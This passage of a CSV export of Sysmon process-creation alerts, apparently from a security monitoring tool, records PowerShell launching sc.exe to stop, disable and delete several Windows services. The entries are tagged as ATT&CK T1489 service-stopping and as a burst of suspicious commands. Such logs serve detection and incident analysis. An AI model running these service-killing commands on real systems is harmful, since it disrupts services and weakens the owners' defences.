\""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.391"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010db142100}"",""processId"":""6112"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Samserver Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.662",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.357 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00103e132100} +ProcessId: 5196 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.360224900Z"",""eventRecordID"":""2662"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.357\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00103e132100}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:28.357"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00103e132100}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.590",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.303 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010bf102100} +ProcessId: 3880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.304832600Z"",""eventRecordID"":""2659"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.303\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010bf102100}\r\nProcessId: 3880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.303"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010bf102100}"",""processId"":""3880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.557",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.270 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010270f2100} +ProcessId: 3812 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 
Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.272524300Z"",""eventRecordID"":""2657"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.270\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010270f2100}\r\nProcessId: 3812\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.270"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010270f2100}"",""processId"":""3812"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.547",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.252 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010480e2100} +ProcessId: 6132 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.255066300Z"",""eventRecordID"":""2656"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.252\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010480e2100}\r\nProcessId: 6132\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.252"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010480e2100}"",""processId"":""6132"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.470",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:50:28.199 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010eb0b2100} +ProcessId: 6072 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.201724700Z"",""eventRecordID"":""2653"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.199\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010eb0b2100}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.199"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010eb0b2100}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.417",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.148 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00107a092100} +ProcessId: 7116 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.150824300Z"",""eventRecordID"":""2650"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.148\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00107a092100}\r\nProcessId: 7116\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.148"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00107a092100}"",""processId"":""7116"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
